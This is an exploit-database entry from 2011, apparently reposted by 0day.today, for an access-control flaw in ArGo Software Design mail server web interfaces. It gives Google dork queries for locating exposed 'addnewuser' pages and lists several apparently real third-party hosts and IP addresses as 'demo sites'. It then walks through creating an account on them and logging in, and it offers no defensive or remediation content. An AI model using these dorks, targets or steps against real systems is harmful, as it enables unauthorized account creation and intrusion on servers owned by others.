ArGo Software Design Add New User (admin) Vulnerability

2011-07-20T00:00:00
ID 1337DAY-ID-16544
Type zdt
Reporter Angel Injection
Modified 2011-07-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:ArGo Software Design Add New User(admin) Vulnerability
# Date: 20/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail[Dot]com
# Vendor or Software Link:http://www.argosoft.com
# Version: All Version
# Category:: webapps
# Google dork: adding new user inurl:addnewuser -"there are no domains"
# 0r: intext:"© ArGo Software Design, 1999-*" intitle:"Adding new user"
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Demo Sites
http://www.tv90.net:81/addnewuser
e-trial.com/addnewuser
80.45.123.89:8080/addnewuser
hassler-j.iies.su.se:81/addnewuser
mosthatedonline.com:88/addnewuser
mail.myemailsafe.com/addnewuser
bassetthsv.com/addnewuser


Exploit
http://www.tv90.net:81/addnewuser

Setup1
User Name: Angel Injection Exmple
Domain: No Domain _~
Password: Inj3ct0r exmple
Confirm Password: You Know ^_~

Setup2
Go To
http://www.tv90.net:81/login
and Full info ^_~


Enjoy
-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team



#  0day.today [2018-02-18]  #